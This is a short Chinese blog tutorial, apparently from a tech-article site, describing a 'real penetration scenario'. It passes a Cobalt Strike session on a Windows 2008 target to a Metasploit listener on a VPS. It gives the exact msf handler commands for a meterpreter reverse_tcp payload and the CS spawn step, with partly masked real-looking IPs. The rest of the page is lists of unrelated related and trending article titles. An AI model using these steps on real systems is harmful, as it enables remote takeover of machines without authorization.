真实渗透场景

靶机：win2008 ip：218.77.102.x
vps（cs 服务端 和 安装了msf）：centos7 ip：45.76.151.x
本地（cs 客户端，连接cs ）：

1. 本地已经连接cs 并且已经上线、我们只需要连接到msf
   

2. 添加监听器
   
   点击add 添加

payload 设置为Foreign HTTP，ip 为vps 主机，设置端口 点击seav

3. 添加成功后如图

4. vps 打开msf，
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 45.76.151.x
set lport 8888
run

1. 点击interact，进入命令行
   
2. 输入 spawn msf msf 是外部监听的名字
   
   
   连接成功
   

Cobalt Strike（cs） 联动 msf相关推荐

1. cobaltstrike如何安装使用(包含CS联动MSF详细用法!)? (ﾟ益ﾟメ) 渗透测试

   文章目录 安装CS 安装Java CS服务器安装与后台运行 CS模拟实战 CS联动MSF MSF通过CS代理连接目标服务器 CS将监听目标传给MSF的会话(sessions)模块 MSF将会话(ses ...

2. APT组织最喜欢的工具 Cobalt Strike (CS) 实战

   一.Cobalt Strike 背景 Cobalt Strike 在威胁攻击者的恶意活动中的使用次数正在增加.从 2019 年到 2020 年,使用Cobalt Strike 的威胁攻击者增加了 16 ...

3. 细说——CS联动MSF

   目录 环境准备 CS --> MSF ubuntu准备 cs客户机器准备 msf准备 补充 MSF --> CS MSF准备 ubuntu-cs准备 网上的文章,写的很简洁,看的脑壳疼,自 ...

4. DAY41：Cobalt Strike 工具使用

   DAY41:Cobalt Strike 工具使用 1.Cobalt Strike 概述 ​ Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器. ​ 自 3.0 以后已 ...

5. Cobalt Strike使用教程——基础篇

   本文主要介绍 Cobalt Strike 4.3 的基本功能及使用方法,具体分析和实战中使用放在另一篇讲解:Cobalt Strike使用方法--实战篇. 文章目录 一.基本介绍 (一) 目录结构 ( ...

6. 告警流量分析：Cobalt Strike（默认实验文）

   文章目录 前言 从去除流量特征反推 分析流量包 200815084549005001_tmp.pcap - 无有用信息 200929112751005001_tmp.pcap - 无有用信息 流量包协 ...

7. Cobalt Strike与Metasploit Framewor联动（会话传递）功能演示

   一.前言 Cobalt Strike 是一个为模拟对手和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁.CS集成了很多功能,这些功能为渗透测试提供了便利的操作.同时CS还支持丰富的插件, ...

8. gophish配合邮件服务器,【CS】Cobalt Strike发送钓鱼邮件

   0x00 简介 关于Spear phish 和发件人伪造的工具有很多个,比如gophish.SimpleEmailSpoofer.命令行工具swaks等,每个工具都有其特点,当然Cobalt Stri ...

9. Cobalt Strike（cs神器）简洁功能介绍、被控端常见执行命令

   Cobalt Strike Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS.最近这个工具大火,成为了渗透测试中不可缺少的利器.其拥有多种协议主机上线方式,集 ...

10. 【内网安全-CS】Cobalt Strike启动运行上线方法插件

    前言: 介绍: 博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章). 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edus ...

最新文章

1. 比较v-bind和v-model
2. JVM---本地方法接口和本地方法栈
3. R语言bioconductor包—maftools的使用
4. opencv和python是什么关系_opencv和python的区别
5. 史上最详细最容易理解的HMM文章
6. MySQL - 无索引行锁升级为表锁
7. OpenSIPS替代VOS3000的方案
8. 重拾PHP--开篇碎碎念
9. CentOS配置ssh无密码登录的注意点
10. QT每日一练day18：文件IO
11. python实现炫酷二维码
12. 动态代理(2)----动态代理和AOP
13. 三星智能电视将用户语音隐私泄露给第三方？
14. HelloWorld Windows Live Writer
15. JBoss - 调整JVM内存 -Xms512m -Xmx1024m
16. Druid 在有赞的使用场景及应用实践
17. steam新授权软件_「西米软件推荐」桌面乱七八糟的人，请认真看完
18. 烽火路由路虚拟服务器,烽火路由器怎么设置?烽火路由器设置详解
19. html网页简单实现图片轮播效果,CSS3简单实现图片切换轮播
20. Python学习手册之Python异常和文件

热门文章

1. 开发团队人员配备与角色分配
2. Godot简单的斜抛运动
3. 国内Linux各版本占有率,Linux市场占有率知多少？
4. 繁体转简体 java_在java中，怎么把繁体字转化为简体字
5. bp神经网络综合评价例题,bp神经网络综合评价法
6. 一起自学SLAM算法：写在前面
7. mysql系统表存放表结构_mysql数据库表结构
8. Hibernate的4种继承关系
9. linux为360路由器刷机,[详细]360路由器刷openwrt、不死uboot、双系统 、wifi中继
10. java integer最大值_Integer的最大值